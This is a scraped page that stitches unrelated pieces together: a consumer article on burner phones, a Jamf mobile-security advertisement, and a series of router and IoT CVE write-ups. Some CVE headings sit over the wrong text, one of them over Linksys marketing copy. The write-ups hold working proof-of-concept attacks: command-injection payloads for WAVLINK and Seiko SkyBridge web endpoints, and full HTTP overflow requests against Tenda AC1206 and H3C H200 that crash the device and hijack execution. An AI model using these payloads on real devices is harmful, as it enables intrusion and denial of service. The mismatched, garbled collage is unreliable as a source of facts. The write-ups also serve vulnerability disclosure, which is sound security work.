Prepaid phones are looking good as privacy worries peak.

Even if surveillance overreach (abortion bounty-hunting, police use of face recognition) doesn't make you want to ditch your smartphone for something less connected, you could still consider a burner phone, a practically disposable prepaid mobile device that's not under contract with a wireless carrier.

Yep, prepaid cell phones that were popularized by brands like Boost Mobile and Cricket in the mid-aughts, and in pop culture by their frequent use in TV's _The Wire__,_ are still around. In fact, tens of millions of customers still go for burner phones, whether they're flip phones or smartphones on Android or iOS from providers such as Verizon-owned TracFone, Simple Mobile, or Total Wireless.

What's the appeal? The idea is that a cheap phone with prepaid calling minutes and data is disposable, free of any contract commitment, and more private. For someone who uses a cell phone or data plan infrequently, it could be much cheaper than a typical mobile phone plan.

Prabhat Agarwal, senior director of research and trends at the Consumer Electronics Association, says that while wireless companies steer customers to post-paid plans with higher-margin 5G data plans and longer commitments, prepaid phones “are not going away anytime soon. There's a lot of groups for which prepaid makes a lot of sense,” he explains.

If you pay cash for the hardware and the service, you are theoretically untethered from being traced to the phone with your bank account, credit card, or home address. Of course, that anonymity vanishes the moment you start using a burner phone to log in to your Facebook account or you commit a crime serious enough to warrant the authorities investigating who used a burner phone to, say, plan an _Ocean's 11_\-style casino heist.

Going off-grid isn't the only reason to get a prepaid phone, though. Maybe you want a dedicated second phone for a side hustle like Lyft driving that doesn't get used all the time, since it won't be subject to use-it-or-lose-it monthly fees. You might be someone who wants to keep your online dating or personal email completely separate from the premium smartphone you use for work. Or you could use a cheap, locked-down phone that allows your kids to call friends and grandparents and play games. A cheap prepaid device won't cause as much stress if the screen gets cracked or the handset ends up in the toilet.

In all these cases, a burner phone can allow you to be accessible by phone but with a different phone number than your main one. If you value keeping your main cell number nonpublic, but you still need to be reachable to a large number of people, a prepaid phone may be simpler than getting a second line or using a service like Google Voice.

How to Choose a Burner Phone

If that sounds interesting, the first thing you need to decide is _how_ _much_ burner phone you actually need. If it's just for phone calls and light data communication, you could go retro with a flip phone and hope you remember how to use T9 texting.

Especially for smartphones, depending on the model, there might be limited built-in memory for apps, video, and other data. You may also need to supply your own SIM and SD cards to use the mobile network and expand the phone's memory. Make sure you remove both of those cards before you get rid of the phone, or at least wipe the memory on the SD card first.

Expect to pay anywhere from $20 for a cheap flip phone to $300 or more for something like a fully loaded prepaid iPhone 11. If being untrackable is your primary goal, paying with a credit card or online account might defeat the purpose. Go to a store. Pay cash or use a gift card. Burn the receipt, or, better yet, don't ask for one.

Prepaid phone plans that include voice, text, and data might be sold in time increments from a month at a time up to a year. Some may offer “unlimited” usage, but be sure to read the fine print on what that actually means. One thing to watch out for, Agarwal says, is that some prepaid data plans have much lower data allotments and may throttle the speed of the network even before you hit your data limit. You should also be aware of what wireless network the prepaid provider uses. For instance, Cricket uses AT&T's mobile network, and TracFone is on Verizon's. That matters less for privacy, but more for understanding where you’ll have service and what speed of wireless service will be available.

If you don't want new hardware in your life, you could look for a software solution such as the aptly named Burner app, available for iOS and Android that promises to give you a second phone line and more privacy for $3.99 to $4.99 a month, depending on your plan.

How to Use a Burner Phone

First, as with any device, you'll need to activate the phone. (There's usually easy-to-follow instructions in the phone packaging.) You can keep buying additional data and voice minutes with prepaid cards you buy in stores or online.

Depending on the phone, you might have access to apps you're already familiar with that offer good privacy and encryption options, such as Telegram or Signal. You could also use VPN apps to further anonymize your online activity.

However, you should understand that no matter how careful you are to protect your privacy, any login to a website from a burner phone or even hopping onto a Wi-Fi network could expose your location data and other private information. The Intercept has a good video guide geared toward protestors with tips to keep some of that data private.

Once you're done with a burner phone, you can erase the data on it with a factory reset (don't forget to wipe the SD card if one is in use). Then stash it away, throw it away, or resell it on the secondary market to a site such as Gazelle or Swappa. You may even be able to trade it in with a wireless carrier.

You’re Not Stringer Bell, but You May Still Need a Burner Phone

The threat landscape has changed dramatically over the past decade. While cybercriminals continue to look for new ways to gain access to networks and steal sensitive information, the mobile attack surface is also expanding.
Mobile devices are not only becoming more powerful but also more vulnerable to cyberattacks, making mobile security an increasingly important concern for enterprises.
This

The threat landscape has changed dramatically over the past decade. While cybercriminals continue to look for new ways to gain access to networks and steal sensitive information, the mobile attack surface is also expanding.

Mobile devices are not only becoming more powerful but also more vulnerable to cyberattacks, making mobile security an increasingly important concern for enterprises.

This means that anyone accessing the Internet via their cell phone or logging into their home or work network at any time is putting both their own personal data and that of their company at risk.

No matter how big or small your business is, you should always take steps to ensure the security of your employees and customers. Recent global attacks have shown us just how vulnerable businesses are to cyberattacks.

There are several ways hackers can attack mobile devices. To protect their data, businesses should take a comprehensive approach that addresses both internal and external threats.

Jamf Threat Defense protects against mobile endpoint (iOS, iPadOS, Android) threat vectors through a highly effective mobile application, the Jamf Trust app, and prevents in-network threats in real-time through Jamf's Secure Access Layer.

Jamf Threat Defense accommodates all device types and ownership models while safeguarding user privacy. Comprehensive, multi-level security solution.

Jamf Threat Defense monitors mobile devices for configuration vulnerabilities and app risks. It also monitors network connections for content threats and network compromises. It assigns risk assessments and provides a range of policy enforcement actions for a response.

Jamf Threat Defense is a great fit for any organization that needs to monitor and secure how its users access corporate data from mobile devices.

**Why might a customer want this?**

If an organization's end users connect to corporate apps with mobile devices, the devices can become attack vectors via phishing, man-in-the-middle attacks, malware, and much more.

Some devices may be corporately owned and managed, but many of these devices may be unmanaged or BYOD, which means organizations have less control and visibility.

**What problems does it solve?**

Phishing: blocks phishing pages if users click on a scam link Protection of Corporate Apps: based on a device's security state and network behavior Malware & Malicious Apps: stops malware from taking data from devices Man-In-The-Middle: prevents interception of connections on un-secured Wi-Fi Zero-Day Threats: machine intelligence engine (MI:RIAM) detects unknown threats before they reach devices Mixed Device Ownership: provides protection for managed and BYOD devices.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Interested in Reducing Your Risk Profile? Jamf Has a Solution for That

WAVLINK WL-WN575A3 RPT75A3.V4300.201217 was discovered to contain a command injection vulnerability when operating the file adm.cgi. This vulnerability allows attackers to execute arbitrary commands via the username parameter.

**Information**

Vendor of the products:WAVLINK

Reported by: FeiXincheng(FXC030618@outlook.com) && WangJincheng(wjcwinmt@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

Affected products:WAVLINK WL-WN575A3

Affected firmware version: RPT75A3.V4300.201217

Vendor Homepage: https://www.wavlink.com/en\_us

Vendor Advisory: https://www.wavlink.com/en\_us/firmware/details/fac744bd61.html

**Summarize**

WAVLINK  WL-WN575A3 was discovered to contain a command injection vulnerability when operate the file adm.cgi. This vulnerability allows attackers to execute arbitrary commands via the username parameter.

**Show the product**

Wavlink WL-WN575A3 s a AC1200 Dual-band Wi-Fi Range Extender. The test version here is RPT75A3.V4300.201217

**Vulnerability details**

The vulnerability is detected at /etc_ro/lighttpd/www/cgi-bin/adm.cgi

At first, from the _startentry enters, and then the ftext function is executed.

In the function ftext, we find that we can controll the content of page field is sysinit, we can execute the set_sys_init function.

In the function set_sys_init, the program uses function web_get to obtain the content of parameter username , newpass which are sent by POST request. Then, when newpass!= 0, the content username is formatted into a string passed as an argument to the function do_system which can execute system commands.

**poc**

Send the following to the URL http://wifi.wavlink.com/cgi-bin/adm.cgi by POST request.

    page=sysinit&username=fxc`ls>/etc_ro/lighttpd/www/fxc.html`
    

**Before attack**

**After attack**

CVE-2022-37149: iot-vul/Readme.md at main · fxc233/iot-vul

Seiko SkyBridge MB-A200 v01.00.04 and below was discovered to contain multiple hard-coded passcodes for root. Attackers are able to access the passcodes at /etc/srapi/config/system.conf and /usr/sbin/ssol-sshd.sh.

**Seiko Skybridge MB-A200 series vulnerabilities.****Product Description:**

The SkyBridge MB-A200 from Seiko are LTE Wireless Router for IoT/M2M and supports a variety of communications including LTE, 4G, 3G, Wi-Fi, LAN, wired WAN, and GPS High-speed data communication.

**Affected Products:**

All Seiko Skybridge MB-A200 devices from version 01.00.04 and under.  

**Vulnerability Summary:**

*   Vulnerability 1 - Unauthenticated OS Command Injection.  
    SkyBridge MB-A200 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the PING HTTP POST parameter in ping_exec.cgi page. This issue affects all SkyBridge MB-A200 version 01.00.04 and under.
    
*   Vulnerability 2 - Use of Hard-coded Cleartext Password.  
    SkyBridge MB-A200 series contains multiple hard-coded clear text credentials for an hidden root user account in the /etc/srapi/config/system.conf and in the /usr/sbin/ssol-sshd.sh file. A malicious actor can de-compile the firmware image and have access to the web UI root password and CLI root password. This issue affects all SkyBridge MB-A200 version 01.00.04 and under.
    

**Reproduction Steps:**

1.  Unauthenticated OS Command Injection.  
    The endpoint /cgi-bin/ping_exec.cgi can be called remotely without user authentication as there is no cookie verification, Cookie: FAKE_VALUE, to check if the request is legitimate. The second problem is that the POST parameter PING can be injected to execute any Linux command. In the example below we create a crafted query that list files of the /www/cgi-bin directory.  
    

**Payload**

2.  Use of Hard-coded Cleartext Password.  
    By default the Skybridge MB-A200 devices have a built-in clear text passwords for the root account that can be recovered after extracting the firmware image and then reverse engineering it. We found that the file /etc/srapi/config/system.conf has clear-text variables called WEBUI_ROOT_PASSWORD to access the web management interface as root and the file /usr/sbin/ssol-sshd.sh has a variable called CLI_ROOT_PASSWORD to access the CLI interface (SSH).  
    

**Recommendation Fixes / Remediation:**

*   Vulnerability 1: Strengthen validation rules by checking if input contains only alphanumeric characters, no other syntax or whitespace, a whitelist of permitted values is also recommended. Please see the following link for more details: https://cwe.mitre.org/data/definitions/78.html
    
*   Vulnerability 2: Need to generate a different password for each device. During the manufacturing process, set a randomly generated password, unique for each device (e.g. print the password on a sticker for local access). Risk: Since passwords are shared among devices, an attacker able to crack the passwords once (e.g. with physical access to the device) can access all reachable devices. Please see the following link for more details: https://cwe.mitre.org/data/definitions/1188.html
    

**Vulnerable Devices Found:**

As of 3Aug2022, there were 968 SkyBridge MB-A200 series devices exposed to the internet and were affected by the vulnerabilities discovered.

**Reference:**

https://www.seiko-sol.co.jp/products/skybridge/lineup/mb-a200/

**Security researchers:**

*   Thomas Knudsen
*   Samy Younsi

CVE-2022-36560: seiko-skybridge-MB-A200.md

Seiko SkyBridge MB-A100/A110 v4.2.0 and below implements a hard-coded passcode for the root account. Attackers are able to access the passcord via the file /etc/ciel.cfg.

**Seiko Skybridge MB-A100/A110 series vulnerabilities.****Product Description:**

The SkyBridge MB-A100/A110 from Seiko are LTE Wireless Router for IoT/M2M and supports a variety of communications including LTE, 3G, Wi-Fi, LAN, wired WAN, and GPS High-speed data communication.  

**Affected Products:**

All Seiko Skybridge MB-A100 and MB-A110 devices from version 4.2.0 and under.  

**Vulnerability Summary:**

*   Vulnerability 1 - Blind OS Command Injection.  
    SkyBridge MB-A100/A110 series is affected by an authenticated OS blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the ipAddress HTTP POST parameter in 07system08execute_ping_01.cgi page. This issue affects all SkyBridge MB-A100/A110 version 4.2.0 and under.  
    
*   Vulnerability 2 - Unrestricted file upload.  
    SkyBridge MB-A100/A110 series is affect by an unrestricted file upload that allows overwriting arbitrary files and could allow an authenticated malicious actor upload a file and overwrite any file in the system by manipulating the filename and append a relative path that will be interpreted during the upload process. Using this method, it is possible to create or rewrite any file in the system. This issue affects all SkyBridge MB-A100/A110 version 4.2.0 and under.  
    
*   Vulnerability 3 - Use of Hard-coded Cleartext Password.  
    SkyBridge MB-A100/A110 series contains multiple hard-coded clear text credentials for an hidden root user account in the /etc/ciel.cfg file. A malicious actor can de-compile the firmware image and have access to the web UI root password and CLI root password. This issue affects all SkyBridge MB-A100/A110 version 4.2.0 and under.

**Reproduction Steps:****1\. Blind OS Command Injection.**

The POST parameter ipAddress of the endpoint /www/cgi-bin/07system08execute_ping_01.cgi can be injected by any Linux commands. In the following example we have created a new HTML page called injection.html in the /www directory.  

**Payload:**

::;echo "The ping command is vulnerable to blind os command injections" \> /www/injection.html;

Even if the server response does not show anything abnormal we can still see that the page has been created.  

**2\. Unrestricted file upload.**

This vulnerability gives us the possibility to overwrite any file on the device by taking advantage of the restore backup functionality which allows us to upload a backup of the configuration file. For this example we will show how it is possible to create a new file called fakpage.html that contains JavaScript code and upload it in the /www directory.  

The server response tells us that the upload was successful. Now we can see that our, fakepage.html has been uploaded in the /www directory and that the JavaScript code has been executed.  

**3\. Use of Hard-coded Cleartext Password.**

By default the Skybridge MB-A100 and MB-A110 devices have a built-in clear text password for the root account that can be recovered after extracting the firmware image and then reverse engineering it. We found that the file /etc/ciel.cfg has clear-text variables called WEBUI_DEVELOP_PASSWORD to access the web management interface as root and a variable called CPASSWORD to access the CLI interface (telnet).  

**Recommendation Fixes / Remediation:**

*   Vulnerability 1: Strengthen validation rules by checking if input contains only alphanumeric characters, no other syntax or whitespace, a whitelist of permitted values is also recommended. Please see the following link for more details: https://cwe.mitre.org/data/definitions/78.html
*   Vulnerability 2: Make sure set a very strict file storage location, better filename sanitizaion logic, file content validation rule. Please see the following link for more details https://cwe.mitre.org/data/definitions/434.html
*   Vulnerability 3: Need to generate a different password for each device. During the manufacturing process, set a randomly generated password, unique for each device (e.g. print the password on a sticker for local access). Risk: Since passwords are shared among devices, an attacker able to crack the passwords once (e.g. with physical access to the device) can access all reachable devices. Please see the following link for more details: \[https://cwe.mitre.org/data/definitions/1188.html\](https://cwe.mitre.org/data/definitions/78.html

**Vulnerable Devices Found:**

As of 3Aug2022, there were 2831 SkyBridge MB-A100/A110 series devices exposed to the internet and were affected by the vulnerabilities discovered.

**Reference:**

https://www.seiko-sol.co.jp/products/skybridge/lineup/mb-a100/

**Security researchers:**

*   Thomas Knudsen
*   Samy Younsi

CVE-2022-36558: seiko-skybridge-MB-A110.md

Linksys E1200 v1.0.04 is vulnerable to Buffer Overflow via ej_get_web_page_name.

**Shop by Category**

Intelligent Mesh™ allows you to expand your network easily with additional routers or nodes.

Seamless coverage throughout your home.

Always offering the highest speeds makes our fast WiFi, even faster.

The latest WiFi standard gives you 5x the speed.

"This router has made an enormous difference in speed and range with our device connectivity. We have no more dead spots and can even access the signal in the front and back yards. It’s speedier too! This is a highly recommended upgrade."

Amanda M

Canton, OH

"This is the 3rd Linksys router I have had and would not install anything else."

Brian V.

Iowa

"I've been a networking guy for years and Linksys is who kind of pioneered home networking in a sense. They did it again with another well designed product."

Matt Dean

Watkinsville, GA

"We love the Linksys brand and trust that it will be a reliable product."

Maluna Kai

Orange, CA

**Shop Customer Favorites**

Best Seller

Best Seller

Best Seller

Best Seller

**Why buy directly from Linksys?**

 

****Fast Free Shipping****

 

****Hassle-free returns****

 

****Simple, secure checkout****

CVE-2022-38555: Linksys | Networking & WiFi Technology

Tenda AC1206 V15.03.06.23 was discovered to contain multiple stack overflows via the deviceMac and the device_id parameters in the function addWifiMacFilter.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the addWifiMacFilter function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the addWifiMacFilter function,the device_mac we entered (the value of deviceMac) and the device_id we entered (the value of deviceId) are formatted with the sprintf function, spliced with %s;%d;%s strings, and saved to mib_value. It is not secure, as long as the size of the data we enter is larger than the size of mib_value, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/addWifiMacFilter HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    deviceMac=a&deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37814: vuln/Tenda/AC1206/14 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the index parameter in the function formWifiWpsOOB.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formWifiWpsOOB function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formWifiWpsOOB function,the index we entered (the value of index) is formatted with the sprintf function, spliced with %s;%s strings, and saved to tmp. It is not secure, as long as the size of the data we enter is larger than the size of tmp, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiWpsOOB HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37808: vuln/Tenda/AC1206/15 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function,V8(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37092: vuln/H3C/H200/5 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetAP5GWifiById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetAP5GWifiById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAP5GWifiById function,V5(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V8, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAP5GWifiById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

Tag

#wifi